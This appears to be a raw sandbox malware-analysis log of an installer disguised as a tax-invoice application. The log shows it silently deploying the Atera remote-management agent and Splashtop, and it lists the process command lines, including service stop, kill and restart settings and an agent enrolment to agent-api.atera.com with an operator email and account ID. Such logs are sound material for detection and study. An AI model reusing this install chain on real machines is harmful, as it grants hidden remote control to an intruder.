                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5688:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7320:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5812:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7352:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\GenericDevicesFileLock
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7868:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: \BaseNamedObjects\C__Program Files (x86)_ATERA Networks_AteraAgent_Packages_AgentPackageProgramManagement_logs_chocolatey.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\Global\Access_ISABUS.HTP.Method
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2200:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2472:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: NULL
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5844:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7748:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8072:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7292:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\SNMPDevicesFileLock
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\NLogMutexTester
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\Global\NLog-FileFileArchiveLock-c:_program files (x86)_atera networks_ateraagent_packages_agentpackagemonitoring_log.txt
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3288:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1464:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: \BaseNamedObjects\Global\{bd59231e-97d1-4fc0-a975-80c3fed498b7}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: \BaseNamedObjects\C__Program Files (x86)_ATERA Networks_AteraAgent_Packages_AgentPackageProgramManagement_logs_choco.summary.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\Global\Access_PCI
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2996:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\HttpDevicesFileLock
                                Source: C:\Windows\Temp\SplashtopStreamer.exeMutant created: \BaseNamedObjects\Global\{47B9233E-7E50-46F2-B442-6A53F0D0F508}
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7684:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8152:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\ServerDevicesFileLock
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3916:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6848:120:WilError_03
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF59C1AFBE99E78D01.TMP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AteraAgent.exe")
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile read: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
                                Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI2D79.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893046 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: SELECT Identifier, Severity, Timestamp FROM ThresholdDuration WHERE Identifier = @id;kDELETE FROM ThresholdDuration WHERE Identifier = @id;
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL);p
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL);p
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21F68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO ThresholdDuration (Identifier,Severity,Timestamp) Values (@identifier, @severity, @timestamp) ON CONFLICT (Identifier) DO UPDATE SET Severity = excluded.Severity, Timestamp = excluded.Timestamp;@
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21F68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO ThresholdDuration (Identifier,Severity,Timestamp) Values (@identifier, @severity, @timestamp) ON CONFLICT (Identifier) DO UPDATE SET Severity = excluded.Severity, Timestamp = excluded.Timestamp;
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: INSERT INTO [AlertsSent] (Timestamp, Alerts) VALUES (@timestamp, @alerts);kExecuteScriptAsync SystemTools Start scriptGuid : {0}Wrunscriptguid {0} 10 W10= disableSendResult
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E22003000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21F68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO Statistics(Name, Timestamp, Value) Values (@name, @timestamp, @value);
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_Timestamp ON AlertedEvents_V2 (Timestamp); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_LogName ON AlertedEvents_V2 (LogName);
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS StatisticsSendTime (Id INTEGER PRIMARY KEY,Timestamp BIGINT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: INSERT INTO Statistics(Name, Timestamp, Value) Values (@name, @timestamp, @value);%StatisticsSendTime
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);@
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL); CREATE UNIQUE INDEX IF NOT EXISTS idx_ThresholdDuration_Identifier ON ThresholdDuration (Identifier);
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL); CREATE INDEX IF NOT EXISTS idx_ThresholdsProfiles_Timestamp ON ThresholdsProfiles (Timestamp);@
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Stub (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2130001397.000001F736A95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS [AlertsSent] (Id INTEGER NOT NULL PRIMARY KEY, Timestamp BIGINT NOT NULL, Alerts TEXT NOT NULL);RY
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E2227C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO StatisticsSendTime (Timestamp) Values (@timestamp);
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_Timestamp ON AlertedEvents_V2 (Timestamp); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_LogName ON AlertedEvents_V2 (LogName);@
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E22130000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO [AlertsSent] (Timestamp, Alerts) VALUES (@timestamp, @alerts);
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E2219C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT Timestamp FROM StatisticsSendTime ORDER BY Timestamp DESC LIMIT 1;
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS [AlertsSent] (Id INTEGER NOT NULL PRIMARY KEY, Timestamp BIGINT NOT NULL, Alerts TEXT NOT NULL);sSELECT MAX([Timestamp]) AS [TimeStamp] FROM [AlertsSent];
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2788198882.0000029E3B3C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE Stub (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL)C<;
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E2219C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT Id, Name, Timestamp, Value FROM Statistics;
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL);p
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL); CREATE UNIQUE INDEX IF NOT EXISTS idx_ThresholdDuration_Identifier ON ThresholdDuration (Identifier);@
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: SELECT [Id], [Alerts], [Timestamp] FROM [AlertsSent] ORDER BY [Timestamp] DESC LIMIT 1;
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);/DELETE FROM Statistics;eSELECT Id, Name, Timestamp, Value FROM Statistics;
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2130001397.000001F736A95000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS [AlertsSent] (Id INTEGER NOT NULL PRIMARY KEY, Timestamp BIGINT NOT NULL, Alerts TEXT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL); CREATE INDEX IF NOT EXISTS idx_ThresholdsProfiles_Timestamp ON ThresholdsProfiles (Timestamp);
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D9F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO ThresholdsProfiles (IsActive,Timestamp,Name,Thresholds) Values (@isActive,@timestamp,@name,@thresholds); DELETE FROM ThresholdsProfiles WHERE Timestamp < @timeToDelete;
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D9F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO ThresholdsProfiles (IsActive,Timestamp,Name,Thresholds) Values (@isActive,@timestamp,@name,@thresholds); DELETE FROM ThresholdsProfiles WHERE Timestamp < @timeToDelete;@
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E22003000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT MAX([Timestamp]) AS [TimeStamp] FROM [AlertsSent];
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: select Name from Win32_PerfFormattedData_Tcpip_NetworkInterface!DataStatsEnabled9InboundBandwidthStatsEnabled;OutboundBandwidthStatsEnabled
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E223ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT Id, IsActive, Timestamp, Name, Thresholds FROM ThresholdsProfiles ORDER BY Timestamp DESC LIMIT 1;
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21F68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT Identifier, Severity, Timestamp FROM ThresholdDuration WHERE Identifier = @id;
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiStatic file information: TRID: Microsoft Windows Installer (60509/1) 57.88%
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiVirustotal: Detection: 18%
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiReversingLabs: Detection: 23%
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\APLICATIVO-WINDOWS-NOTA-FISCAL.msi"
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF843BCBC9EBED5C34216282DB92822D
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI2D79.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893046 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI2FBD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893546 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI3FBB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6897625 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3A3D5EBA34EB9624AE48E4F4D08FECDB E Global\MSI0000
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="contato@fazendadoscordeiros.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000P2oAPIAZ" /AgentId="52187e48-563c-468d-9785-3542f81fb412"
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI56F2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6903546 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "cb3e2cb9-55c1-438a-8389-94c341441cc1" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "b007e062-743d-47e1-a870-a586f83a0d8d" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
